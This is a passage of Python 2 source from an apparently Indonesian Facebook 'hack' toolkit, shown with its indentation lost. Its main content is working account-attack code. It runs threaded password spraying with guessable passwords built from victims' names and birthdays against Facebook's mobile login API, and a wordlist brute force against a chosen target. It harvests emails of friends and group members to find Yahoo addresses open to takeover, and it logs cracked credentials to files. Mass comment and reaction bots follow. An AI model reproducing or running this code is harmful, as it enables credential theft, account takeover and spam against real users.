if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name']+'doraemon321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass7+" =>"+z['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(1)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
